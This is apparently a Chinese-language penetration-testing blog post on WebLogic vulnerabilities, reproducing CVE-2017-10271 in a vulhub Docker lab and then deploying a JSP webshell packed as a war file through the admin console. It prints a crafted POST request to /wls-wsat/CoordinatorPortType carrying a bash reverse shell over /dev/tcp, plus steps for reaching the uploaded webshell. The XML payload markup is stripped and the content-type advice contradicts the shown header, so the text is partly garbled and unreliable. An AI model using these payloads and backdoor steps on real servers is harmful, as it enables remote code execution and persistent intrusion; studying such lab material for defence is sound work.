中间件漏洞-weblogic

漏洞简介:

weblogic是美国Oracle公司出品的一个applicationserver。确切的说是一个基于javaee架构的中间件,weblogic是用于开发、集成、部署和管理大型分布式web应用、网络应用和数据库应用的java应用服务器,将java的动态功能和java enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中

反序列化漏洞

cve2017-10271复现:

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271),Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

还是vulhub的环境,我们cd /vulhub/weblogic进到cve2017-10217目录下启动测试环境:

docker-compose up -d

等待一段时间,访问http://you ip :7001/即可看到一个404界面。说明weblogic已成功启动

我们首先在地址栏加上如下一串路径:/wls-wsat/CoordinatorPortType

如果显示如下,则表示存在漏洞:

那我们可以burp抓取一个这个页面的数据包

然后构造一个如下的数据包发送

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633
//这是注释,不必复制
//下面是恶意代码块,其中构造了反弹shell
//上面的content-type是必须要设置为text/html
 





/bin/bash


-c


bash -i >& /dev/tcp/youip/port 0>&1







本地nc监听先监听着,然后静等反弹shell吧

以下是必须的:

content-type:text/html

然后反弹成功,如果失败,可以尝试更换端口

war后门部署

得到登录口令后,上传war包:

制作war包,将准备好的jsp大马保存为zip格式,然后重命名为war即可

1:点击部署

中间件漏洞-weblogic_第1张图片

2:选择安装

中间件漏洞-weblogic_第2张图片

3:点击上传文件,上传准备好的war包

中间件漏洞-weblogic_第3张图片

中间件漏洞-weblogic_第4张图片

上传成功:

中间件漏洞-weblogic_第5张图片

继续点击下一步:

中间件漏洞-weblogic_第6张图片

中间件漏洞-weblogic_第7张图片

中间件漏洞-weblogic_第8张图片

中间件漏洞-weblogic_第9张图片

中间件漏洞-weblogic_第10张图片

中间件漏洞-weblogic_第11张图片

然后访问根据路径访问大马文件:

/test/xxx.jsp?o=admin

ssrf:待更新

任意文件上传:待更新

你可能感兴趣的:(中间件漏洞)